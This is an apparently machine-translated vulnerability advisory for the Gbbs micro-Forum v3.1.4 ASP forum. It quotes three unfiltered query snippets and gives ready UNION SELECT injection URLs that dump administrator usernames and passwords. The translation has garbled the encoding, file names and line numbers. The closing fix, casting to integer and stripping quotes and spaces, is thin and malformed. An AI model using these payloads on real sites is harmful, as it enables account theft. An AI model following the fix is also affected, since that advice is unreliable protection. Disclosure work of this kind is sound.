Gbbs micro-Forum v3.1.4 injection and repair

Official Address: http://www.softatm.com Proof of vulnerability:/css/ss.txt program download: http://down.chinaz.com/soft/33484.htm Vulnerability file/userinfo. asp lines 72 to 74 vulnerability types: Injection Vulnerability Information: <p> <% yhm = request ("yhm") set rs = server. createobject ("adodb. recordset ") exec =" select * from yrwl_tb_admin where yhm = '"+ yhm +"' "cause: No filter injection statements are available. directly execute the query hazard: SQL Injection Vulnerability, the password of the user account is directly disclosed. Exp:/userinfo. asp? Yhm = '% 20 union % 20 select % ,,2, 3, yhm % 2 bchr (35) % 2 bpass, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15% 20 from % 20yrwl_tb_admin vulnerability file/userinfo. asp 2-7 vulnerability types: Injection Vulnerability Information: mc = request ("ad") if mc <> "" then set rs = server. createobject ("adodb. recordset ")'' locate SQL = "select * from yrwl_ad_dhl where cl = '1' and mc = '" + mc & "'. Cause: No filter injection statement is available, danger of directly executing a query: SQL Injection Vulnerability directly exposes the user account and password. Exp:/ad. asp? Ad = '% 20 union % 20 select %, 2, 3, 4, 5, 6, 7, 8, yhm % 2 bchr (35) % 2 bpass % 20 from % 20yrwl_tb_admin vulnerability file/userinfo. asp 32 rows, 52 rows Vulnerability Type: integer injection vulnerability information: id = request ("id ")... Exec = "select * from yrwl_tb_lt where id =" + id cause: No filter injection statement is available. directly execute the query hazard: SQL injection vulnerability, which directly exposes the user account and password. Exp:/bbs_bj.asp? Id = 11% 20and % 201 = 2% 20 union % 20 select % 201, yhm % 2 bchr (35) % 2 bpass, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,16, 17,18, 19% 20 from % 20yrwl_tb_adminSolution

, Integer type filtering characters CInt () character type filtering space and 'replace (str, "'", ") Replace (str," % 20 ″,"")